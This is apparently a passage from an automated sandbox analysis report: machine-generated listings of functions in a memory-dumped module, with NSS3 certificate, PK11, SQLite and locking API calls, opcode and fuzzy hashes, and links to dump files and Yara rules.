DER_GetInteger_Util.NSS3(?), ref: 6C748973
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C748982
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7489EC
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C748A12

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Arena_Tag_$AlgorithmErrorFindFree$ArenaDecodeInitInteger_Item_LockPoolcalloc
String ID:
API String ID: 2145430656-0
Opcode ID: 6fde17e40a882b472d84c0fb5a95ba1f42ca9f712a5e6d868528b39c6b951deb
Instruction ID: 226674ecce157f46f344fa4dad366025d2d6e4ebca26a02c16d6b54ab1fbf8f7
Opcode Fuzzy Hash: 6fde17e40a882b472d84c0fb5a95ba1f42ca9f712a5e6d868528b39c6b951deb
Instruction Fuzzy Hash: 8F317DB1B04A0897F71046396E497AA3A989F9131CF244737D915D7BC1FB35C45A81C3

Function 6C70DCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C70DCFA

Part of subcall function 6C7C9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C810A27), ref: 6C7C9DC6
Part of subcall function 6C7C9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C810A27), ref: 6C7C9DD1
Part of subcall function 6C7C9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7C9DED

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C70DD40
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C70DD62
CERT_DestroyCertificate.NSS3(?), ref: 6C70DD71
CERT_DestroyCertificate.NSS3(00000000), ref: 6C70DD81
CERT_RemoveCertListNode.NSS3(?), ref: 6C70DD8F

Part of subcall function 6C7206A0: TlsGetValue.KERNEL32 ref: 6C7206C2
Part of subcall function 6C7206A0: EnterCriticalSection.KERNEL32(?), ref: 6C7206D6
Part of subcall function 6C7206A0: PR_Unlock.NSS3 ref: 6C7206EB

CERT_DestroyCertificate.NSS3(?), ref: 6C70DD9E
CERT_DestroyCertificate.NSS3(?), ref: 6C70DDB7

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
String ID:
API String ID: 653623313-0
Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction ID: 6b24a2faabd4a522642c5b9cddf9343c65dc7fc2a4a0e02c49aa52a79c972240
Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction Fuzzy Hash: 7C21ACF6F012169BDB019EA5DE469AFB7F4AF25318B140032ED08A7701F721E914CBE6

Function 6C810860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

PR_LogFlush.NSS3(00000000,00000000,?,?,6C817AE2,?,?,?,?,?,?,6C81798A), ref: 6C81086C

Part of subcall function 6C810930: EnterCriticalSection.KERNEL32(?,00000000,?,6C810C83), ref: 6C81094F
Part of subcall function 6C810930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C810C83), ref: 6C810974
Part of subcall function 6C810930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810983
Part of subcall function 6C810930: _PR_MD_UNLOCK.NSS3(?,?,6C810C83), ref: 6C81099F

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C817AE2,?,?,?,?,?,?,6C81798A), ref: 6C81087D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C817AE2,?,?,?,?,?,?,6C81798A), ref: 6C810892
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C81798A), ref: 6C8108AA
free.MOZGLUE(?,00000000,00000000,?,?,6C817AE2,?,?,?,?,?,?,6C81798A), ref: 6C8108C7
free.MOZGLUE(?,00000000,00000000,?,?,6C817AE2,?,?,?,?,?,?,6C81798A), ref: 6C8108E9
free.MOZGLUE(?,6C817AE2,?,?,?,?,?,?,6C81798A), ref: 6C8108EF
PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C817AE2,?,?,?,?,?,?,6C81798A), ref: 6C81090E

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
String ID:
API String ID: 3145526462-0
Opcode ID: 01c3a590089f2c9d194856db81f8aa2eb4ab690efcc5a3175923974a5ccd7773
Instruction ID: d79119eaf0acb61265d398fb438bbe3b0bbeed73249a89caca548f04581955d0
Opcode Fuzzy Hash: 01c3a590089f2c9d194856db81f8aa2eb4ab690efcc5a3175923974a5ccd7773
Instruction Fuzzy Hash: 611126B9B052514BFF309B59CE4576637B8AB4131CF182130E806C7A42DB71EC20CBD2

Function 6C703C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,6C77460B,?,?), ref: 6C703CA9
EnterCriticalSection.KERNEL32(?), ref: 6C703CB9
PL_HashTableLookup.NSS3(?), ref: 6C703CC9
SECITEM_DupItem_Util.NSS3(00000000), ref: 6C703CD6
PR_Unlock.NSS3 ref: 6C703CE6
CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C703CF6
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C703D03
PR_Unlock.NSS3 ref: 6C703D15

Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
String ID:
API String ID: 1376842649-0
Opcode ID: d51b37329585c367415842e59d339389aaf5385f20894a7b709e35774ff087fd
Instruction ID: 1d05e2d45fcd1058a1801796126e90232c206cb5c062ce68c67d3861ef5a600b
Opcode Fuzzy Hash: d51b37329585c367415842e59d339389aaf5385f20894a7b709e35774ff087fd
Instruction Fuzzy Hash: 071106BAF00115B7EB111B359D0ACAA3AB9EB1225CB154170EC1883711FB22D868C7D2

Function 6C788D20 Relevance: 10.8, APIs: 7, Instructions: 290memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFD002,00000000), ref: 6C788E19
free.MOZGLUE(?), ref: 6C788E2D
PORT_Alloc_Util.NSS3(?), ref: 6C788F01
memcpy.VCRUNTIME140(?,?,?), ref: 6C788F57
free.MOZGLUE(?), ref: 6C788F7D
PR_GetCurrentThread.NSS3 ref: 6C788F8A
PR_SetError.NSS3(FFFFD044,00000000), ref: 6C7890D6

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Errorfree$Alloc_CurrentThreadUtilmemcpy
String ID:
API String ID: 4163001165-0
Opcode ID: f9d2d8f6192d0d50642f5716ac484e7943fec13f38c11f0cfd1ac70f731e44d9
Instruction ID: 053ca42b12ff938962edf8b072685864dd7e820a7bca01839d9d2eb4ec34cd42
Opcode Fuzzy Hash: f9d2d8f6192d0d50642f5716ac484e7943fec13f38c11f0cfd1ac70f731e44d9
Instruction Fuzzy Hash: 75A1C5756057019FE710CF24CA45BAAB3E9EF58308F04493EEA49DB652E731E544C7A2

Function 6C778C10 Relevance: 10.8, APIs: 7, Instructions: 279COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C778C93

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

Part of subcall function 6C758A60: TlsGetValue.KERNEL32(6C7061C4,?,6C705F9C,00000000), ref: 6C758A81
Part of subcall function 6C758A60: TlsGetValue.KERNEL32(?,?,?,6C705F9C,00000000), ref: 6C758A9E
Part of subcall function 6C758A60: EnterCriticalSection.KERNEL32(?,?,?,?,6C705F9C,00000000), ref: 6C758AB7
Part of subcall function 6C758A60: PR_Unlock.NSS3(?,?,?,?,?,6C705F9C,00000000), ref: 6C758AD2

memset.VCRUNTIME140(?,00000000,?), ref: 6C778CFB
memset.VCRUNTIME140(?,00000000,?), ref: 6C778D10

Part of subcall function 6C758970: TlsGetValue.KERNEL32(?,00000000,6C7061C4,?,6C705639,00000000), ref: 6C758991
Part of subcall function 6C758970: TlsGetValue.KERNEL32(?,?,?,?,?,6C705639,00000000), ref: 6C7589AD
Part of subcall function 6C758970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C705639,00000000), ref: 6C7589C6
Part of subcall function 6C758970: PR_WaitCondVar.NSS3 ref: 6C7589F7
Part of subcall function 6C758970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6C705639,00000000), ref: 6C758A0C

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockmemset$CondErrorWait
String ID:
API String ID: 2412912262-0
Opcode ID: 59661b6d6c070822507824395b4fdba2375d174f63afc61048941ff89a45e1be
Instruction ID: f746f8b421a394348b7ec6883a7247f9f85ed83475b3fea1ca4b30e25d8956cc
Opcode Fuzzy Hash: 59661b6d6c070822507824395b4fdba2375d174f63afc61048941ff89a45e1be
Instruction Fuzzy Hash: 30B15EB0D002089BDF24CF65DE44AAEB7BAEF48308F14453ED81AA7751E731A955CBA1

Function 6C709C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7211C0: PR_NewLock.NSS3 ref: 6C721216

free.MOZGLUE(?), ref: 6C709E17
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C709E25
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C709E4E
TlsGetValue.KERNEL32 ref: 6C709EA2

Part of subcall function 6C719500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C719546

EnterCriticalSection.KERNEL32(?), ref: 6C709EB6
PR_Unlock.NSS3 ref: 6C709ED9
PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C709F18

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
String ID:
API String ID: 3381623595-0
Opcode ID: 203d4b42c5953947a31484310a22cfa86b7c8ef7f95653eaf0cad0f44eb5c6d1
Instruction ID: 1c9cde160883964fe438bc514382091b018052660e36536e108538569f8cc270
Opcode Fuzzy Hash: 203d4b42c5953947a31484310a22cfa86b7c8ef7f95653eaf0cad0f44eb5c6d1
Instruction Fuzzy Hash: 7C81D5B2A04201ABE7109F34DE49AAB77E9BF6524CF184538EC5987F41FB31E918C791

Function 6C71DCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C71AB10: DeleteCriticalSection.KERNEL32(D958E852,6C721397,5B5F5EC0,?,?,6C71B1EE,2404110F,?,?), ref: 6C71AB3C
Part of subcall function 6C71AB10: free.MOZGLUE(D958E836,?,6C71B1EE,2404110F,?,?), ref: 6C71AB49
Part of subcall function 6C71AB10: DeleteCriticalSection.KERNEL32(5D5E6C91), ref: 6C71AB5C
Part of subcall function 6C71AB10: free.MOZGLUE(5D5E6C85), ref: 6C71AB63
Part of subcall function 6C71AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C71AB6F
Part of subcall function 6C71AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C71AB76

TlsGetValue.KERNEL32 ref: 6C71DCFA
EnterCriticalSection.KERNEL32(00000000), ref: 6C71DD0E
PK11_IsFriendly.NSS3(?), ref: 6C71DD73
PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C71DD8B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C71DE81
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C71DEA6
PR_Unlock.NSS3(?), ref: 6C71DF08

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
String ID:
API String ID: 519503562-0
Opcode ID: a2fc2ddf3890154efc5ccba583dea764f2cf54e7d2d658e6657dc368e6ca2f8f
Instruction ID: 5b7385d2e6f915d891f2435d8e46ca84084f02b914b44999ff150734bc3fda14
Opcode Fuzzy Hash: a2fc2ddf3890154efc5ccba583dea764f2cf54e7d2d658e6657dc368e6ca2f8f
Instruction Fuzzy Hash: A39102B5A041019FDB01CF68CA89BAAB7B5BF64309F194039DC189BF41E731E909CF95

Function 6C684F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C684FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6851BB

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6851A5
misuse, xrefs: 6C6851AF
%s at line %d of [%.10s], xrefs: 6C6851B4
unable to delete/modify user-function due to active statements, xrefs: 6C6851DF

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: 1863835089ef6a3851b7ac0124cd2457a582058c13fbf910a80006a91c407abb
Instruction ID: 1072135d429a6882949201caef5d6261595f3bd03dd3fb2b84785209ccee8426
Opcode Fuzzy Hash: 1863835089ef6a3851b7ac0124cd2457a582058c13fbf910a80006a91c407abb
Instruction Fuzzy Hash: 6B71AE7560520A9FEB01CE55CD80BEA77B9BF48308F044528FD1A9BB81D731E854CBA5

Function 6C6F2D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C6F2D69

Strings

winTruncate2, xrefs: 6C6F2EF8
winTruncate1, xrefs: 6C6F2EBE
winUnmapfile2, xrefs: 6C6F2F7F
winUnmapfile1, xrefs: 6C6F2F55
winSeekFile, xrefs: 6C6F2E9C

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: __allrem
String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
API String ID: 2933888876-3221253098
Opcode ID: 606de43b3cb799db3e862f19d1c27b07cd4bd4cc9a47b8c6d44faf8251966c03
Instruction ID: 961276c8755fd98f512dc2d16875b5176b2ce984099a806ed161c6bed8072669
Opcode Fuzzy Hash: 606de43b3cb799db3e862f19d1c27b07cd4bd4cc9a47b8c6d44faf8251966c03
Instruction Fuzzy Hash: 8761B171A002059FDB54CF64DC98AAA77B2FF89318F20853CE9199B780DB34AD06CF95

Function 6C7729E0 Relevance: 10.7, APIs: 7, Instructions: 181COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,00000000,00000000,?,?,6C7721DD,00000000), ref: 6C772A47
SEC_ASN1EncodeInteger_Util.NSS3(?,6C7721DD,00000002,00000000,00000000,?,?,6C7721DD,00000000), ref: 6C772A60
SECOID_FindOIDByTag_Util.NSS3(00000000,?,?,?,?,00000000,00000000,?,?,6C7721DD,00000000), ref: 6C772A8E
PK11_KeyGen.NSS3(00000000,?,00000000,83F089CA,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C772AE9
PORT_ArenaMark_Util.NSS3(00000000), ref: 6C772B0D
PK11_FreeSymKey.NSS3(?), ref: 6C772B7B
PK11_FreeSymKey.NSS3(?), ref: 6C772BD6

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: K11_Util$Free$ArenaEncodeErrorFindInteger_Mark_Tag_
String ID:
API String ID: 1625981074-0
Opcode ID: 1cc31cb384a699bffeb429d7ebee7626dbb220028daed72a23288e6dff04df0d
Instruction ID: dd7cbe80e14d95a1ee17f2a8f3276f04aeb64fe3128e6bd7802d220626790b03
Opcode Fuzzy Hash: 1cc31cb384a699bffeb429d7ebee7626dbb220028daed72a23288e6dff04df0d
Instruction Fuzzy Hash: 3851C871E00209DBEF208E65DE89BAA77B5AF4431CF150138ED2997791FB31E905CBA1

Function 6C72BCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C72BD1E

Part of subcall function 6C702F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C702F0A
Part of subcall function 6C702F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C702F1D

Part of subcall function 6C7457D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C70B41E,00000000,00000000,?,00000000,?,6C70B41E,00000000,00000000,00000001,?), ref: 6C7457E0
Part of subcall function 6C7457D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C745843

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C72BD8C

Part of subcall function 6C75FAB0: free.MOZGLUE(?,-00000001,?,?,6C6FF673,00000000,00000000), ref: 6C75FAC7

CERT_DestroyCertList.NSS3(00000000), ref: 6C72BD9B
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C72BDA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C72BE3A

Part of subcall function 6C703E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C703EC2
Part of subcall function 6C703E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C703ED6
Part of subcall function 6C703E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C703EEE
Part of subcall function 6C703E60: PR_CallOnce.NSS3(6C862AA4,6C7612D0), ref: 6C703F02
Part of subcall function 6C703E60: PL_FreeArenaPool.NSS3 ref: 6C703F14
Part of subcall function 6C703E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C703F27

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C72BE52

Part of subcall function 6C702E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C702CDA,?,00000000), ref: 6C702E1E
Part of subcall function 6C702E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C702E33
Part of subcall function 6C702E00: TlsGetValue.KERNEL32 ref: 6C702E4E
Part of subcall function 6C702E00: EnterCriticalSection.KERNEL32(?), ref: 6C702E5E
Part of subcall function 6C702E00: PL_HashTableLookup.NSS3(?), ref: 6C702E71
Part of subcall function 6C702E00: PL_HashTableRemove.NSS3(?), ref: 6C702E84
Part of subcall function 6C702E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C702E96
Part of subcall function 6C702E00: PR_Unlock.NSS3 ref: 6C702EA9

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C72BE61

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
String ID:
API String ID: 2178860483-0
Opcode ID: 6e680d0327f124372b2740a154854e5870e466e2dec643385fec0f90e35e14e0
Instruction ID: 11ec0c3baadfca77d048f58c219336514d1c718f25e7d798351de0c640296a6a
Opcode Fuzzy Hash: 6e680d0327f124372b2740a154854e5870e466e2dec643385fec0f90e35e14e0
Instruction Fuzzy Hash: 1A41E2B6E00210AFC710CF28DE89AAA77E8EB49718F144168F94997711E735FD14CB92

Function 6C716980 Relevance: 10.6, APIs: 7, Instructions: 126COMMON

Download Yara Rule

APIs

